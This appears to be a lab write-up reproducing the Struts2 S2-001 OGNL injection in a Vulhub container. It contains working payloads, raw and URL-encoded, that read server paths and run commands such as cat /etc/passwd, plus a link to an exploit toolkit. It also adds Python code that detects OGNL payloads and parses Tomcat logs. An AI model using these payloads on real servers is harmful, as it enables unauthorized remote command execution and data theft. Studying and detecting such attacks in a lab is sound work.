Reproducing S2-001 in Vulhub
0X00-Introduction
There are no gurus here, just a script kiddie 🐱🏍
Scripts above all 😍
0X01-Environment setup
Target machine: CentOS Linux 7
Attack machines: Windows Server 2016 && Kali
Environment: vulhub
Project address: https://github.com/vulhub/vulhub
To set up vulhub, see: Setting up vulhub on a blank CentOS 7 64-bit (detailed)
0X02-Vulnerability description
When a user submits form data and validation fails, the previously submitted parameter values are evaluated as the OGNL expression %{value} and then filled back into the form data in the response. For example, on a registration or login page the backend normally returns the previously submitted values after a failed submission; because %{value} is reused, the submitted data goes through one round of OGNL expression evaluation, so a payload can be constructed directly for command execution.
Affected versions: Struts 2.0.0 - Struts 2.0.8
0X03-Vulnerability reproduction
01-Test whether the vulnerability exists
Enter the payload in the form
payload: %{2+2}
Submit and check the echoed value
The expression is evaluated and the result is returned, so the vulnerability exists
02-Get the Tomcat execution path
Capture the request with Burp Suite and send it to Repeater
Enter the payload:
%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}
After URL encoding:
%25%7b%22%74%6f%6d%63%61%74%42%69%6e%44%69%72%7b%22%2b%40%6a%61%76%61%2e%6c%61%6e%67%2e%53%79%73%74%65%6d%40%67%65%74%50%72%6f%70%65%72%74%79%28%22%75%73%65%72%2e%64%69%72%22%29%2b%22%7d%22%7d
Success
03-Get the web path
payload:
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
URL-encoded:
%25%7b%23%72%65%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%73%74%72%75%74%73%32%2e%53%65%72%76%6c%65%74%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%40%67%65%74%52%65%71%75%65%73%74%28%29%2c%23%72%65%73%70%6f%6e%73%65%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74%52%65%73%70%6f%6e%73%65%22%29%2e%67%65%74%57%72%69%74%65%72%28%29%2c%23%72%65%73%70%6f%6e%73%65%2e%70%72%69%6e%74%6c%6e%28%23%72%65%71%2e%67%65%74%52%65%61%6c%50%61%74%68%28%27%2f%27%29%29%2c%23%72%65%73%70%6f%6e%73%65%2e%66%6c%75%73%68%28%29%2c%23%72%65%73%70%6f%6e%73%65%2e%63%6c%6f%73%65%28%29%7d
04-Execute arbitrary commands
The payload can be modified; the command argument is
new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})
and can be changed to
new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})
payload:
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
URL-encoded:
%25%7b%23%61%3d%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%50%72%6f%63%65%73%73%42%75%69%6c%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%5b%5d%7b%22%70%77%64%22%7d%29%29%2e%72%65%64%69%72%65%63%74%45%72%72%6f%72%53%74%72%65%61%6d%28%74%72%75%65%29%2e%73%74%61%72%74%28%29%2c%23%62%3d%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%63%29%2c%23%65%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%64%2e%72%65%61%64%28%23%65%29%2c%23%66%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74%52%65%73%70%6f%6e%73%65%22%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%70%72%69%6e%74%6c%6e%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%65%29%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%66%6c%75%73%68%28%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%63%6c%6f%73%65%28%29%7d
cat /etc/passwd is executed
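From the defender's side, every request shown above arrives as an ordinary URL-encoded login form whose field value is an OGNL expression rather than a username or password. The following Python is an added example (not part of the Vulhub project or this post) that decodes such a form body and flags the indicators a practitioner would look for in a WAF rule or a request-logging filter: the %{...} expression wrapper, @class@method static calls, access to the #context/#req/#response objects, and process spawning. The indicator set and the sample bodies are constructed for the example.

```python
"""Flag OGNL-expression indicators in URL-encoded form submissions.

Added example for the S2-001 write-up; not code from Vulhub or Struts.
The indicator list below is constructed for illustration; tune it to your own
false-positive tolerance before using it in a detection rule.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs, unquote

# Each indicator is a regular expression run over the *decoded* field value.
OGNL_INDICATORS = {
    # The %{...} wrapper that makes Struts 2.0.x re-evaluate a field as OGNL.
    "ognl_expression": re.compile(r"%\{.*\}", re.S),
    # Static method invocation syntax, e.g. @java.lang.System@getProperty.
    "static_method_call": re.compile(r"@[\w.]+@\w+"),
    # Access to the action context or request/response wrappers.
    "context_access": re.compile(r"#context\b|#req\b|#response\b"),
    # Anything that would spawn a process from the expression.
    "process_spawn": re.compile(r"ProcessBuilder|Runtime@getRuntime|\.exec\("),
}


def decode_form_body(body: str) -> dict[str, list[str]]:
    """Decode an application/x-www-form-urlencoded body into name -> values."""
    return parse_qs(body, keep_blank_values=True)


def ognl_findings(value: str) -> list[str]:
    """Return the indicator names that match one decoded form value.

    A second unquote() pass catches double-encoded submissions; invalid
    percent escapes such as '%{' are left untouched by unquote().
    """
    decoded = unquote(value)
    return [name for name, rx in OGNL_INDICATORS.items() if rx.search(decoded)]


def scan_form_body(body: str) -> dict[str, list[str]]:
    """Map each suspicious field name to the indicators it triggered."""
    findings: dict[str, list[str]] = {}
    for field, values in decode_form_body(body).items():
        hits = set()
        for value in values:
            hits.update(ognl_findings(value))
        if hits:
            # Preserve the indicator order from OGNL_INDICATORS for stable output.
            findings[field] = [name for name in OGNL_INDICATORS if name in hits]
    return findings


if __name__ == "__main__":
    # Constructed sample bodies: a normal login and the %{2+2} probe from the write-up.
    for sample in (
        "username=admin&password=hunter2",
        "username=admin&password=%25%7b2%2b2%7d",
    ):
        print(sample, "->", scan_form_body(sample))
```

Only the decoded value is inspected, so the check does not depend on how the attacker chose to encode the request; a field that merely contains a literal "%" in a password produces no hit because the wrapper, the @...@ call syntax and the context names are all required for their respective indicators.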
0X04-Tool-based detection
Strongly recommending a tool: it is extremely powerful, covers exploits for six OA systems, middleware and five databases, can even switch skins, and is still being updated
Link: https://github.com/Liqunkit/LiqunKit_
0X05-View the logs
Look up the container ID, then enter the container
docker ps #list containers to get the ID
docker exec -it 910e341b0e88 /bin/bash #enter the container
cat localhost_access_log.2021-12-01.txt #view the access log
exit #leave the container
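The access log read above records only the request line, status and response size, not the POST body that carries the expression, so what it can tell you is which client submitted the login form, how often, and how large each response was. The following Python is an added example (not from Vulhub or this post) that parses lines in Tomcat's default "common" AccessLogValve format and isolates POSTs to .action endpoints per client; the log lines are constructed to resemble the file above.

```python
"""Parse Tomcat access log lines and isolate form POSTs to Struts actions.

Added example for the S2-001 write-up; the log lines are constructed, not
taken from a real container. Format assumed: Tomcat's default "common"
AccessLogValve pattern  %h %l %u %t "%r" %s %b
"""
from __future__ import annotations

import re
from collections import Counter

LOG_LINE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Constructed sample: one GET of the form, three POSTs from the same client
# (the validation-failed page is re-rendered with status 200 each time), and
# an unrelated static request from another client.
SAMPLE_LOG = """\
172.18.0.1 - - [01/Dec/2021:10:15:02 +0000] "GET /login.action HTTP/1.1" 200 1043
172.18.0.1 - - [01/Dec/2021:10:15:40 +0000] "POST /login.action HTTP/1.1" 200 1102
172.18.0.1 - - [01/Dec/2021:10:16:05 +0000] "POST /login.action HTTP/1.1" 200 1391
172.18.0.1 - - [01/Dec/2021:10:16:31 +0000] "POST /login.action HTTP/1.1" 200 2210
172.18.0.9 - - [01/Dec/2021:10:20:11 +0000] "GET /static/style.css HTTP/1.1" 200 512
"""


def parse_line(line: str) -> dict | None:
    """Parse one access log line; return None for lines in another format."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    # Tomcat writes "-" for a zero-length response body.
    entry["bytes"] = 0 if entry["bytes"] == "-" else int(entry["bytes"])
    return entry


def struts_posts(log_text: str) -> list[dict]:
    """All POST requests whose path (query string stripped) is a Struts action."""
    entries = (parse_line(line) for line in log_text.splitlines())
    return [
        e for e in entries
        if e and e["method"] == "POST" and e["path"].split("?", 1)[0].endswith(".action")
    ]


def posts_per_host(log_text: str) -> Counter:
    """Count action POSTs per client address, the first pivot for triage."""
    return Counter(e["host"] for e in struts_posts(log_text))


if __name__ == "__main__":
    for host, count in posts_per_host(SAMPLE_LOG).most_common():
        print(f"{host}: {count} POST(s) to .action endpoints")
    for e in struts_posts(SAMPLE_LOG):
        print(e["time"], e["host"], e["path"], e["status"], e["bytes"])
```

Because the expression itself never reaches this log, confirming what was submitted requires the request body from a WAF, a reverse proxy with body logging, or the application's own logging; the access log narrows the time window and the source address for that search.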